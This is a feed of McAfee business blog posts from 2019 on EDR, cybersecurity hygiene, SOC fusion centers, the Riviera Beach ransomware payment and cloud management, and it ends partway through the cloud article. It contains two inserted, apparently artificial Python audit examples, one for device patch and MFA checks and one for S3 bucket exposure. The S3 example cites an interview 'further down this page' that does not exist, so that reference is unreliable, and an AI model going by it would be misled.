McAfee Enterprise – McAfee Blogs
https://securingtomorrow.mcafee.com
Securing Tomorrow. Today.
Feed last built Mon, 07 Oct 2019 21:51:58 +0000 (en-US)

ST11: MVISION Insights
https://securingtomorrow.mcafee.com/other-blogs/podcast/st11-mvision-insights/
Thu, 03 Oct 2019 19:41:46 +0000

McAfee’s Senior Director of Security Intelligence Bill Woods and McAfee’s Director of Product Management Robert Leong discuss the importance of intelligence and insights.

The post ST11: MVISION Insights appeared first on McAfee Blogs.

ST10: Unified Cloud Edge with Sadik AlAbdulla and Tom Bryant
https://securingtomorrow.mcafee.com/other-blogs/podcast/st10-unified-cloud-edge-with-sadik-alabdulla-and-tom-bryant/
Thu, 03 Oct 2019 16:11:43 +0000

Sadik AlAbdulla, one of McAfee’s Vice Presidents of Product Management, and Tom Bryant, Global Technical Director of Web & DLP, are at MPOWER 2019 discussing the newly announced Unified Cloud Edge.

ST09: Strategic Intelligence vs. Tactical Threat Intelligence
https://securingtomorrow.mcafee.com/other-blogs/podcast/st09-strategic-intelligence-vs-tactical-threat-intelligence/
Mon, 23 Sep 2019 17:05:25 +0000

McAfee’s Director of Product Management Robert Leong and Security Operations Solutions Strategist Andrew Lancashire unpack the differences between strategic intelligence and tactical threat intelligence.  

ST08: Uncovering the opportunity of EDR with Chris Young, Ash Kulkarni, Josh Zelonis, and David Barron
https://securingtomorrow.mcafee.com/other-blogs/podcast/st08-uncovering-the-opportunity-of-edr-with-chris-young-ash-kulkarni-josh-zelonis-and-david-barron/
Fri, 06 Sep 2019 16:05:21 +0000

In this exclusive episode featuring McAfee CEO Chris Young, we’re exploring EDR guided investigation and the opportunities it provides for reducing alert noise, maximizing the productivity of cybersecurity teams, and reducing triage and remediation times. Chris is joined by McAfee’s Chief Product Officer Ash Kulkarni, Forrester’s Principal Analyst Josh Zelonis, and GM Financial’s Assistant Vice President of Cybersecurity David Barron, who each provide their unique perspectives on how guided investigation can address the security challenges and needs of today’s enterprises.

Easier Management with Integrated Endpoint Security
https://securingtomorrow.mcafee.com/business/endpoint-security/easier-management-with-integrated-endpoint-security/
Thu, 05 Sep 2019 15:42:36 +0000

Integration matters. We at McAfee have been advocating the administrative benefits of integrated, centrally managed endpoint security for decades, but you don’t just have to take our word for it. A recent independently written article in BizTech Magazine concurs.

BizTech explores the technology and business issues that IT leaders and business managers face when evaluating and implementing solutions. In “Businesses Find Endpoint Security Easier to Manage with Integrated Solutions,” journalist Kym Gilhooly references a number of independent security surveys and interviews a CISO, an IT manager, and a network administrator at three different companies. Each of these cybersecurity professionals and their respective small and medium-sized companies came to the same conclusion: to defend against today’s breadth of threats, from signature-based to zero-day, known and unknown, an integrated security approach combining endpoint detection and response (EDR), next-generation antivirus, and application control makes more sense than deploying discrete solutions.

Uniting these technologies in one integrated solution has allowed them to take action across the threat defense lifecycle—from detecting and blocking threats and whitelisting critical applications to tracking down malicious exploits during or before execution and helping incident response teams respond and remediate faster. As CISO Tony Taylor of dairy company Land O’Lakes points out in the article, “There are lots of security tools out there, but if you don’t integrate the stack, you’ve got to associate all that information and make the connections yourself.”

EDR Becoming an Integral Component of Endpoint Security

All the companies interviewed by Gilhooly affirm the importance of EDR in their security defense. As an IT manager at a 500-employee retail company states in the article, “The days when IT took a set-it-and-forget-it approach to endpoint security are over.” The ability to quickly investigate threats—whether reactively seeking to understand where a threat originated, how it spread and what damage it caused, or proactively hunting for anomalous behavior and dormant threats—is becoming a must-have tool to shrink the response and remediation gap.

What’s more, the article recognizes that an integrated EDR-EPP (endpoint protection platform) solution makes much more sense than bolting on an EDR point solution, because EDR and EPP can enhance each other’s effectiveness. For instance, if a company uses McAfee Endpoint Security or the SaaS-based McAfee MVISION Endpoint alongside McAfee MVISION EDR, then when the EPP part of the integrated solution detects anomalous behavior on an endpoint, but not enough to convict it, an analyst can use EDR to enrich the data and raise or lower the incident’s severity ranking accordingly. On the flip side, when the EDR part detects an unknown threat in the environment, the analyst can query the threat reputation database and share the new threat information across all endpoints via the EPP.

The more cyberdefense tools can collaborate and be managed as a unified solution, the more actions can be automated, IT staff burdens reduced, and time freed up for more proactive forensics and other activities.

In short, the BizTech article reiterates what we’ve been saying: Integration is more than just a buzzword. It’s time to stop thinking about EDR as an add-on, or EPP and EDR as separate entities. It’s also time to start moving endpoint security to the cloud. The article touches on that, too.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business.

ST07: Protecting IP in Healthcare with Andrew Lancashire and Sumit Sehgal
https://securingtomorrow.mcafee.com/other-blogs/podcast/st07-protecting-ip-in-healthcare-with-andrew-lancashire-and-sumit-sehgal/
Mon, 19 Aug 2019 18:34:21 +0000

For episode seven, returning guest Andrew Lancashire is joined by Chief Healthcare Technical Strategist Sumit Sehgal to discuss protecting intellectual property, with an emphasis on the healthcare industry.

McAfee for McAfee: An Intern Journey
https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/mcafee-for-mcafee-an-intern-journey/
Thu, 25 Jul 2019 15:42:33 +0000

By Gwendolyn McAfee

My grandfather always told me that I could achieve anything the world has to offer if I put my mind to it.  To me, that saying means that I am more powerful than anything else. I’ve always had a passion for technology, and somehow, everything I did, whether it was at school or in my personal life, technology was at the center of it.

So, when I started my junior year of college, I set a goal for myself to find a corporate internship in technology. Getting into an internship wasn’t as straightforward as I’d hoped. Determination and a little bit of good timing brought me to a career fair at my university, Prairie View A&M, where McAfee was in attendance. I spoke to the wonderful representatives and they encouraged me to apply for a position. I thought it was cliché. I mean, just because my surname is the same, does that mean I’m meant to work for McAfee? But then I said to myself, “The company is TOTALLY for you; it literally has your name (McAfee) on it. What other signs do you need?” So, I applied for a position, and eight months later, I found myself at McAfee as a Channel Operations Intern. Now, two months into my internship, McAfee has provided me with the real-world, hands-on projects and experience that I longed for in an internship.

Here are three reasons why my internship with McAfee has been a truly irreplaceable experience.

  1. “We innovate without fear.”

When I walked into McAfee on my first day, I felt the energy and strength of the people that make up McAfee. Everyone at McAfee innovates without fear. It is such an amazing sight to see McAfee employees so committed to creating and improving without fear of being judged or fear of failure. And instead of being told what to do, I got to share what my passions are, what I wanted to work on, and what I hoped I could take away from my overall experience. My manager heard me and created a tailored plan for me. I create presentations, spreadsheets, and new strategies to help McAfee connect more with partners and customers. And I love the fact that I have the same expectations, responsibilities, and opportunities as any other team member. I truly feel like I get to add value to my team with every project that I complete. And that’s an exceptional feeling.

  2. Opportunities All Around

Through my internship at McAfee, I have gained a plethora of opportunities to attend different events and do things that I wouldn’t usually do. In my first few weeks in my internship, I collaborated with the university recruiters to create the first McAfee intern group community. Through this, we were able to help interns connect with others, and with McAfee executives. This helps every intern grow professionally, which goes back to McAfee’s mantra, “Together is Power.” The impact of connecting and working together is something that I cherish and firmly believe is one of the greatest things about working at McAfee.

  3. Overall Amazing

McAfee influences the world by providing top cybersecurity programs, giving back to the community, and being a top company to work for. McAfee has made an impact on my life, and my time here has shown me that I can truly make an impact on anything as long as I put my mind to it.

Cybersecurity Hygiene: 8 Steps Your Business Should be Taking
https://securingtomorrow.mcafee.com/business/cybersecurity-hygiene-8-steps-your-business-should-be-taking/
Tue, 16 Jul 2019 15:00:50 +0000

Whether you’re managing your enterprise’s cybersecurity or you’ve outsourced it to a service provider, you’re ultimately the one that will be held accountable for a data breach. If your vendor loses your data, your customers and board of directors will likely still hold you responsible.

McAfee’s recent report, Grand Theft Data II: The Drivers and Shifting State of Data Breaches, reveals a majority of IT professionals have experienced at least one data breach, and on average have dealt with six breaches over the course of their career. Nearly three-quarters of all breaches have required public disclosure or have affected financial results.

Enterprise threats are increasing in number and sophistication and are rapidly targeting new vulnerabilities. And while the top three vectors for exfiltrating data were database leaks, cloud applications, and removable USB drives, IT professionals are most worried about leaks from enterprise cloud applications such as Microsoft OneDrive, Cisco WebEx, and Salesforce.com.

Cybersecurity hygiene best practices must not only be established but updated and followed to keep up with these agile, versatile threats. Here are eight steps your business should be taking to implement better cybersecurity hygiene:

  1. Educate Your Teams – All employees are part of an organization’s security posture. And yet 61% of IT professionals say their executives expect more lenient security policies for themselves, and 65% of those respondents believe this leniency results in more incidents. “Do as I say, not as I do” is dangerous. Develop a continuing cybersecurity education program for all enterprise teams, including best practices for passwords and how to detect phishing emails. The program should also include re-education for your IT team on common breach targets such as default accounts and missing patches.
  2. Timely Patches and Updates – The report found that IT was implicated in most data breaches, and much of this can be attributed to failures in cybersecurity hygiene: not getting a security patch out across the enterprise within 24 to 72 hours, or not checking that all available updates have been applied on every device. Systems can remain vulnerable for months after a fix is available. Cloud and SaaS operations have proven that automated patch testing and deployment works well with minimal downside risk.
  3. Implement Data Loss Prevention (DLP) Policies – Data loss prevention requires thinking through the data, the applications, and the users. Most security teams continue to operate in isolation, with 81% reporting separate policies or management consoles for cloud access security brokers (CASBs) and DLP. It is more important than ever to have a consistent set of DLP policies that protect data everywhere it is stored, including the cloud, corporate endpoints, networks, and unmanaged devices.
  4. Pay Attention to Cloud Security Settings – Cloud applications are where the bulk of your data resides, and data is what most cybercriminals are after. As DevOps moves more workloads to the cloud, your enterprise needs to review the security settings of the cloud instances it uses and understand the security of the underlying infrastructure. Many security measures and considerations in the cloud are the same as on-premises, but some are different. Understanding the security of the cloud you choose and of the applications you run there is a critical part of navigating digital transformation securely.
  5. Technology Integration and Automation – One of the top actions cited for reducing future breach risk is integrating the various security technologies into a more cohesive defense. A lack of integration between security products allows suspicious activity to dwell unnoticed. If an attack is identified and blocked, all entry points should be informed immediately. If a compromised device is detected, security products should automatically scan all other devices for evidence of similar compromise and quarantine affected systems. Automation lets machines make these decisions based on policy set by the security team, accelerating detection and remediation without incurring material risk of unintended IT consequences.
  6. Deploy and Activate CASB, DLP, EDR – A Cloud Access Security Broker (CASB) automatically classifies sensitive information and enforces security policies such as data loss prevention, rights management, data classification, threat protection, and encryption. Data Loss Prevention (DLP) safeguards intellectual property and supports compliance by protecting sensitive data. Endpoint Detection and Response (EDR) gives your enterprise visibility into emerging threats with little maintenance by monitoring endpoint activity, detecting suspicious behavior, making sense of high-value data, and supplying context. EDR can also reduce your need for additional SOC resources.
  7. Run Proper Device Audits – Regularly verify that encryption is enabled on all devices, including laptops, tablets, and mobile phones. Multifactor authentication strengthens your security beyond common-sense steps like evaluating and promoting password strength.
  8. Have an Incident Response Plan – You may have only minutes or hours to act on a cyberattack, and good intentions are not enough to respond to and remedy a breach effectively. Be prepared before it happens. An Incident Response Plan is integral to responding more effectively and reducing business disruption and loss of reputation.
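The patch-lag, encryption and cross-fleet indicator checks in steps 2, 5 and 7 can be expressed as a small audit over a device inventory. The following is an added example written for this page, not McAfee’s or the report’s code; the inventory record layout, the 72-hour patch window, the host names and the file hashes are all constructed for the example, and a real deployment would pull these fields from an EPP or MDM export or API instead.

```python
"""Fleet hygiene audit over a constructed device inventory (added example).

Per device: flags patch lag beyond a 72-hour window (step 2), missing disk
encryption or MFA (step 7), and presence of a known-bad file hash. Once one
host is convicted, sweep() treats that hash as a fleet-wide indicator and
returns every host carrying it, the "scan all other devices" part of step 5.
The record layout and every value below are assumptions made for this example.
"""
from datetime import datetime, timedelta, timezone

PATCH_SLA = timedelta(hours=72)  # step 2: patch out across the fleet within 24-72 hours

# Constructed inventory records; an EPP/MDM export would supply these in practice.
INVENTORY = [
    {"host": "fin-lt-01", "last_patch": "2019-07-15T08:00:00Z",
     "disk_encrypted": True, "mfa": True, "hashes": {"h-clean-1"}},
    {"host": "fin-lt-02", "last_patch": "2019-07-10T09:00:00Z",
     "disk_encrypted": True, "mfa": True, "hashes": {"h-bad-1", "h-clean-2"}},
    {"host": "ops-lt-03", "last_patch": "2019-07-16T06:00:00Z",
     "disk_encrypted": False, "mfa": False, "hashes": {"h-clean-3"}},
    {"host": "hr-tab-04", "last_patch": "2019-07-14T12:00:00Z",
     "disk_encrypted": True, "mfa": True, "hashes": {"h-bad-1"}},
]

# Constructed indicator: the hash of a file convicted on one host.
KNOWN_BAD = {"h-bad-1"}

# Fixed "now" so the example is reproducible; it matches the post's date.
NOW = datetime(2019, 7, 16, 15, 0, tzinfo=timezone.utc)


def parse_ts(value):
    """Parse an ISO-8601 UTC timestamp with a trailing 'Z' into an aware datetime."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def audit(inventory, now=NOW, known_bad=KNOWN_BAD, sla=PATCH_SLA):
    """Return {host: [issue, ...]} for every device that fails a hygiene check."""
    findings = {}
    for dev in inventory:
        issues = []
        lag = now - parse_ts(dev["last_patch"])
        if lag > sla:
            issues.append(f"patch lag {lag.days}d")
        if not dev["disk_encrypted"]:
            issues.append("disk not encrypted")
        if not dev["mfa"]:
            issues.append("no MFA")
        if dev["hashes"] & known_bad:
            issues.append("known-bad hash present")
        if issues:
            findings[dev["host"]] = issues
    return findings


def sweep(inventory, indicators):
    """Step 5: given indicators taken from a convicted host, list every host carrying one.

    Each returned host is a candidate for automatic quarantine; whether that
    happens without a human in the loop is a policy decision for the SOC.
    """
    return sorted(d["host"] for d in inventory if d["hashes"] & indicators)


if __name__ == "__main__":
    for host, issues in audit(INVENTORY).items():
        print(f"{host}: {', '.join(issues)}")
    print("quarantine candidates:", sweep(INVENTORY, KNOWN_BAD))
```

On the constructed inventory the audit flags fin-lt-02 for a six-day patch lag and the known-bad hash, ops-lt-03 for missing encryption and MFA, and hr-tab-04 only for the hash; the sweep then returns both hosts that carry the indicator, which is the list an integrated EPP would push a quarantine action to.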

For more on how to improve your enterprise’s cybersecurity hygiene using automation, integration, and cloud-based deployment and analytics, check out McAfee MVISION EDR.

ST06: Building Resilience with Cyber Threat Intelligence with Mo Cashman, Martin Ohl, and Leon Ward
https://securingtomorrow.mcafee.com/other-blogs/podcast/st06-building-resilience-with-cyber-threat-intelligence-with-mo-cashman-martin-ohl-and-leon-ward/
Thu, 11 Jul 2019 17:00:52 +0000

McAfee’s Director of Solution Architects and Principal Engineer Mo Cashman and Solution Architect Martin Ohl team up with ThreatQuotient’s VP of Product Management Leon Ward to discuss the lies and myths of threat intelligence.

The Ever-Evolving SOC
https://securingtomorrow.mcafee.com/business/security-operations/the-ever-evolving-soc/
Mon, 08 Jul 2019 15:00:32 +0000

In the 17th century, poet John Donne wrote, “no man is an island entire of itself.” He also mentioned every man is “a part of the main.” Fast forward to the 21st century and you’ll find this concept still rings true, especially as it relates to security.

Like everything else in the world, the security industry is constantly evolving. More sophisticated, targeted threats are emerging at an exponential rate and organizations need high-caliber solutions – and strategy – to keep up. However, when organizations act independently, they put themselves at risk by not incorporating the lessons learned from others or they experience roadblocks that delay resolution when they do not have access to full context or information. Keeping true to Donne’s word, every organization must realize they are in the same fight together, which is why we’ve seen the rise of fusion centers across the globe.

New Problems, New SOCs

Taking Security Operations Centers (SOCs) to the next level, fusion centers are designed for knowledge sharing. They connect all parts of an organization, with the end goal of increasing transparency and visibility so that threats are uncovered before they materialize or stopped quickly in their tracks. Fusion centers have a further benefit: they help advance the cybersecurity industry by identifying the new products and solutions needed to keep pace with the evolution of threats.

Operating at a global scale, fusion centers have proven to be an avenue to rapidly process and centralize seemingly unrelated and dispersed information. Using analytics to identify patterns and behaviors from a tremendous amount of data across multiple endpoints facilitates increased threat detection and correction – allowing for real-time remediation.

Advice for Enterprises

Access to intelligence and better, more coordinated strategies are imperative for enterprises to succeed in 2019 and beyond. To break it down, the intent of threat actors is to “beat” the security measures in place, and it is harder for them to succeed against multiple coordinated pieces of technology than against one. Fusion centers give the industry that coordination, including artificial intelligence and feedback mechanisms, to present a more well-rounded defense against attackers.

For example, when an organization is hit by an attack that follows a pattern already seen elsewhere but lacks the information a fusion center can provide, the breach takes longer to detect. That extra time can have dire consequences: a longer detection and response time means damage to the organization’s reputation as well as financial impact through lost revenue. Organizations should strive to share intelligence reciprocally; it is absolutely a two-way street. The more structure there is behind identifying the data elements that correlate with threat actors’ patterns, the greater the chance threats will be found and fixed quickly.

We’ve seen some additional benefits and lessons learned from fusion centers, including:

  • Focus on people and process – Technology is only part of the solution. For now, humans need to work alongside machines and technology in order to thrive. The conversation has moved from a single individual asking, “How do I use this tool to the best of my capability,” to an all-in mentality that is focused on the broader organization to improve overall processes and approach.
  • Consolidation is key – The disparity of data and information introduces room for error. Having a different point product on every endpoint creates complexity and introduces risks. Simplification of an organization’s security environment, including combination and coordination between tool sets, is beneficial. Organizations should strategically choose which vendors they would like to work with and evaluate how solutions can work together to provide ultimate optimization.
  • Great foundation, better security hygiene – A major lesson some organizations learn the hard way is that in hindsight, they should have exercised better practices to drive maturity within their SOC. Having a strong control of assets and information and knowing where data lies at any given time is extremely critical. Without this, organizations risk the chance of being blindsided when they go to investigate a case and find an asset on their network they were unaware of.
  • Strengthen existing processes – Make sure your organization’s authentication is secured so that you have visibility into user behavior across the environment. Additionally, organizations need to examine their patching cycles and vulnerability management programs to identify any flaws that can be addressed. This drives the maturity of the SOC and provides another opportunity to stay ahead of the curve.

It takes a village

Knowing the talent gap the cybersecurity industry still faces, CISOs need to be prominent leaders in their organization to shape the future of how the SOC evolves and how fusion centers can be leveraged to thwart or quickly remedy attacks. The challenges will only get more complex, so investing in continual education, mentoring of existing and new employees and staying abreast of trends and new technologies will be crucial.

The $1.5 Million Email
https://securingtomorrow.mcafee.com/business/the-1-5-million-email/
Tue, 25 Jun 2019 20:05:37 +0000

Ransomware has been around since the late 1980s, but in recent years, it has emerged as one of the largest financial threats facing the public and private sector alike. According to the U.S. Department of Homeland Security, ransomware is the fastest-growing malware threat—and according to a report by Recorded Future in May, more than 170 state and local governments have been the victims of ransomware attacks since 2013.

In addition to improved ransomware capabilities, such as properly implemented strong encryption that leaves victims no practical way to recover their files without the key, two key factors have emboldened cybercriminals to launch such attacks: the rise of pseudonymous cryptocurrency such as Bitcoin, which lets attackers collect payment without a bank in the loop, and the tendency of unprepared targets to keep meeting scammers’ demands, even as those demands become increasingly audacious.

One such target was the city of Riviera Beach, Fla., a waterfront suburb north of Palm Beach, which recently paid a near-record 65 Bitcoins to a gang of hackers after a ransomware attack brought the city to a halt.

On May 29, a city employee opened an email containing a piece of malware, which quickly infected nearly every city computer network. With the municipal computer system held hostage, all operations were hobbled—everything from the city’s website, email server and VoIP phones to the water utility pump stations. 911 dispatchers were forced to take down caller information on paper, employees and vendors had to be paid with paper checks, utility payments could only be accepted by snail mail or in person, and police officers had to resort to digging through closets at headquarters to find paper traffic citation pads.

City leaders were told they could make all of these problems go away—if they simply complied with the ransomers’ demand to remit 65 bitcoin (roughly $600,000) in exchange for the decryption key.

While the city had originally decided not to pay the ransom—opting instead to invest $914,000 into purchasing hundreds of new desktop and laptop computers and other hardware in an attempt to circumvent the issue—these measures ultimately failed. Three weeks after the original attack, based on the advice of an outside security consulting firm, the city council met to discuss next steps—and unanimously decided, after just two minutes of discussion, to acquiesce. The total cost, including the unbudgeted-for hardware, the consultation, and of course, the ransom itself, amounted to more than $1.5 million. For a city of just 35,000 residents, the cost was staggering, even after insurance paid its percentage.

While Riviera Beach was among the latest targets, it certainly won’t be the last, or the largest—according to a 2018 Deloitte-NASCIO survey, nearly half of states lack a separate cybersecurity budget, and a majority allocate under 3% of IT budgets to cyberthreat prevention.

But as ransomware attacks continue to strike any unsuspecting target at any time, many of those targets are finding that, as much as they thought they lacked the resources to prevent such attacks, they’re even less prepared for the aftermath. Once infected, they’re left with two unsavory options. The first is to pay the ransom, knowing that there’s no guarantee the hackers will decrypt the systems, or that the decryption will be complete. And even if it is, there are still the moral implications: when governments pay such ransoms, they’re not only putting taxpayer dollars directly into the hands of criminals, they’re also encouraging future ransomware attacks. The alternative, of course, is to try to rebuild, often from the ground up.

While cyberinsurance policies can give the illusion of protection, this solution will likely become less viable as the frequency of attacks continues to rise and the amount demanded continues to skyrocket. The goal, then, becomes for companies, government entities and individuals to prepare for and prevent these attacks before they’re targeted. While large-scale legislative solutions, such as outlawing the payment of ransomware demands, may eventually offer some relief, here are some steps that companies, individuals and government entities can take right now to prevent being victims:

  1. Learn: Resources such as NoMoreRansom.org—an initiative created by the National High Tech Crime Unit of Netherlands, Europol’s European Cybercrime Centre, and McAfee—aim to provide prevention education and help ransomware victims retrieve their encrypted data without having to pay criminals.
  2. Educate: When it comes to ransomware, knowing isn’t half the battle—it’s the entire battle. When millions of dollars hinge on your employees’ decision whether or not to open an email, organization-wide training on how to spot malicious emails and social engineering schemes may pay for itself many, many times over.
  3. Backup: There’s no reason to pay criminals to decrypt your data if you have access to a copy. Frequently back up essential data, ideally storing it both locally and in the cloud.
  4. Update: Always installing the newest version of your operating system and apps helps you stay ahead of threats.
  5. Defend: Sufficiently robust security solutions can protect you from known threats as well as those that have not yet been formally detected.

The post The $1.5 Million Email appeared first on McAfee Blogs.

ST05: Protecting Intellectual Property with Andrew Lancashire and Kate Scarcella https://securingtomorrow.mcafee.com/other-blogs/podcast/st05-protecting-intellectual-property-with-andrew-lancashire-and-kate-scarcella/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st05-protecting-intellectual-property-with-andrew-lancashire-and-kate-scarcella/#respond Fri, 14 Jun 2019 16:07:38 +0000 https://securingtomorrow.mcafee.com/?p=95605

In this episode, security operations solutions strategist Andrew Lancashire and Kate Scarcella discuss the importance of protecting your intellectual property in the workplace.

The post ST05: Protecting Intellectual Property with Andrew Lancashire and Kate Scarcella appeared first on McAfee Blogs.

How to Get the Best Layered and Integrated Endpoint Protection https://securingtomorrow.mcafee.com/business/endpoint-security/how-to-get-the-best-layered-and-integrated-endpoint-protection/ https://securingtomorrow.mcafee.com/business/endpoint-security/how-to-get-the-best-layered-and-integrated-endpoint-protection/#respond Mon, 20 May 2019 17:00:46 +0000 https://securingtomorrow.mcafee.com/?p=95281


Security teams have historically been challenged by the choice of separate next-gen endpoint security technologies or a more integrated solution with a unified management console that can automate key capabilities. At this point it’s not really a choice at all – the threat landscape requires you to have both. The best layered and integrated defenses now include a broad portfolio of advanced prevention technologies, endpoint security controls, and advanced detection/response tools – all within an integrated system that goes beyond alerts and into insights that even a junior analyst can act on.

More Endpoints = More Vulnerabilities

Endpoints have long since extended beyond on-premises servers, PCs, and traditional operating systems. Internet of Things (IoT) devices such as printers, scanners, point-of-sale handhelds, and even wearables are vulnerable and can provide entry points for organized attacks seeking access to corporate networks. Mobile devices—both BYOD and corporate-issued—are among the easiest targets for app-based attacks. Per the 2019 McAfee Mobile Threat Report, the number one threat category was hidden apps, which accounted for almost one-third of all mobile attacks.

Many enterprises are unaware of their target-rich endpoint environments, resulting in security teams struggling to maintain complete vigilance. A 2018 SANS Survey on Endpoint Protection and Response revealed some sobering statistics:

  • 42% of respondents report having had their endpoints exploited
  • 84% of endpoint breaches include more than one endpoint
  • 20% didn’t know whether they’d been breached

Endpoint attacks are designed to exploit the hapless user, including web drive-by, social engineering/phishing, and ransomware. Because these attacks rely on human actions, there’s a need for increased monitoring and containment, along with user education.

The latest attacks have the ability to move laterally across your entire environment, challenging every endpoint until a vulnerability is found. Once inside your walls, all endpoints become vulnerable. Modern endpoint security must extend protection across the entire digital terrain with visibility to spot all potential risks.

Fewer Consoles = Better Efficiency

A 2018 MSA Research report on security management commissioned by McAfee revealed that 55% of organizations struggle to rationalize data when three or more consoles are present. Too many security products, devices, and separate consoles call for a large budget and additional employees who might struggle to maintain a secure environment.

In contrast, a single management console can efficiently coordinate the defenses built into modern devices while extending their overall posture with advanced capabilities—leaving nothing exposed. With ever-changing industry requirements, an integrated endpoint security approach ensures that basic standards and processes are included and up to date.

Why McAfee Endpoint Security

McAfee offers a broad portfolio of security solutions that combine established capabilities (firewall, reputation, and heuristics) with cutting-edge machine learning and containment, along with endpoint detection and response (EDR) into a single-agent all-inclusive management console.

Is it time you took a fresh look at your strategy? Learn more in this white paper: Five ways to rethink your endpoint protection strategy.

The post How to Get the Best Layered and Integrated Endpoint Protection appeared first on McAfee Blogs.

Cloud 101: Navigating the Top 5 Cloud Management Challenges https://securingtomorrow.mcafee.com/business/cloud-security/cloud-101-navigating-the-top-5-cloud-management-challenges/ https://securingtomorrow.mcafee.com/business/cloud-security/cloud-101-navigating-the-top-5-cloud-management-challenges/#respond Wed, 15 May 2019 15:00:13 +0000 https://securingtomorrow.mcafee.com/?p=95174


Cloud management is a critical topic that organizations are looking at to simplify operations, increase IT efficiency, and reduce costs. Although cloud adoption has risen in the past few years, some organizations aren’t seeing the results they’d envisioned. That’s why we’re sharing a few of the top cloud management challenges enterprises need to be cautious of and how to overcome them.

Cloud Management Challenge #1: Security

Given the overall trend toward migrating resources to the cloud, a rise in security threats shouldn’t be surprising. Per our latest Cloud Risk and Adoption Report, the average enterprise organization experiences 31.3 cloud-related security threats each month—a 27.7% increase over the same period last year. Broken down by category, these include insider threats (both accidental and malicious), privileged user threats, and threats arising from potentially compromised accounts.

To mitigate these types of cloud threats and risks, we have a few recommendations to better protect your business. Start with auditing your Amazon Web Services, Microsoft Azure, Google Cloud Platform, or other IaaS/PaaS configurations to get ahead of misconfigurations before they open a hole in the integrity of your security posture. Second, it’s important to understand which cloud services hold most of your sensitive data. Once that’s determined, extend data loss prevention (DLP) policies to those services, or build them in the cloud if you don’t already have a DLP practice. Right along with controlling the data itself goes controlling who the data can go to, so lock down sharing where your sensitive data lives.
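The audit step above (check your IaaS configuration before a misconfiguration opens a hole) is easiest to see on the most common case, a storage bucket exposed to the world, which is also the scenario Patrick Butler describes in the Loop Secure interview further down this page. The following Python is an added example, not McAfee’s or any customer’s code: it reads an S3 bucket policy document and the bucket’s Public Access Block settings, reports which Allow statements grant access to anonymous principals, and works out whether the Public Access Block would neutralise them. The policy, bucket name, account ID and organization ID are constructed placeholders.

```python
import json

# Added example (not McAfee's code): audit an S3 bucket policy and its Public Access
# Block settings for the classic "bucket open to the world" misconfiguration.
# Both inputs below are constructed samples; bucket, account and org IDs are placeholders.

SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "AccountOnly", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
         "Action": ["s3:GetObject", "s3:PutObject"],
         "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "WildcardWithCondition", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*",
         "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-exampleorgid"}}},
    ],
})

# Constructed sample of a Public Access Block configuration with two settings left off.
SAMPLE_PAB = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
              "BlockPublicPolicy": False, "RestrictPublicBuckets": False}

PAB_SETTINGS = ("BlockPublicAcls", "IgnorePublicAcls",
                "BlockPublicPolicy", "RestrictPublicBuckets")


def _as_list(value):
    """IAM policy elements may be a single string/object or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def is_anonymous_principal(principal) -> bool:
    """True when Principal means 'anyone': a bare "*" or {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def find_wildcard_statements(policy_json: str) -> dict:
    """Split Allow statements with an anonymous principal into those that are
    unconditional (public) and those narrowed by a Condition (needs review: a
    condition such as aws:PrincipalOrgID restricts access, aws:SecureTransport does not)."""
    doc = json.loads(policy_json)
    result = {"public": [], "review": []}
    for i, stmt in enumerate(_as_list(doc.get("Statement", []))):
        if stmt.get("Effect") != "Allow" or not is_anonymous_principal(stmt.get("Principal")):
            continue
        key = "review" if stmt.get("Condition") else "public"
        result[key].append(stmt.get("Sid", f"statement[{i}]"))
    return result


def public_access_block_gaps(pab: dict) -> list:
    """Settings of the bucket's Public Access Block that are not enabled."""
    return [k for k in PAB_SETTINGS if not pab.get(k, False)]


def audit_bucket(policy_json: str, pab: dict) -> dict:
    """Combine both checks. A public policy statement only takes effect while
    RestrictPublicBuckets is off; with it on, S3 ignores the anonymous grant."""
    statements = find_wildcard_statements(policy_json)
    gaps = public_access_block_gaps(pab)
    effective = statements["public"] if "RestrictPublicBuckets" in gaps else []
    return {
        "public_statements": statements["public"],
        "conditioned_wildcards": statements["review"],
        "public_access_block_gaps": gaps,
        "effectively_public": effective,
    }


if __name__ == "__main__":
    print(json.dumps(audit_bucket(SAMPLE_POLICY, SAMPLE_PAB), indent=2))
```

In practice the two inputs come from `aws s3api get-bucket-policy --bucket NAME` (the `Policy` field, a JSON string) and `aws s3api get-public-access-block --bucket NAME` (the `PublicAccessBlockConfiguration` object). Run the audit across every bucket in the account, not only the ones already known to hold sensitive data; the inventory of where sensitive data lives, recommended above, is only reliable once the configuration sweep is complete.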

Cloud Management Challenge #2: Governance

Many companies deploy cloud systems without an adequate governance plan, which increases the risk of security breaches and inefficiency. Lack of data governance may result in a serious financial loss, and failing to protect sensitive data could result in a data breach.

Cloud management and cloud governance are often interlinked, and keeping track of your cloud infrastructure is essential. Governance and infrastructure planning can help mitigate certain infrastructure risks, so automated cloud discovery and governance tools will help your business safeguard operations.

Cloud Management Challenge #3: Proficiency

You may also be faced with the challenge of ensuring that IT employees have the proper expertise to manage their services in a cloud environment. You may need to decide to either hire a new team that is already familiar with cloud environments or train your existing staff.

In the end, training your existing staff is less expensive, scalable, and faster. Knowledge is key when transforming your business and shifting your operational model to the cloud. Accept the challenge and train your employees, give them hands-on time, and get them properly certified. For security professionals, the Cloud Security Alliance is a great place to start for training programs.

Cloud Management Challenge #4: Performance

Enterprises are continually looking for ways to improve their application performance and their internal and external SLAs. However, even in the cloud, they may not immediately achieve these benefits. Cloud performance is complex, and if you’re having performance issues, it’s important to look at the variety of causes that could be at work in your environment.

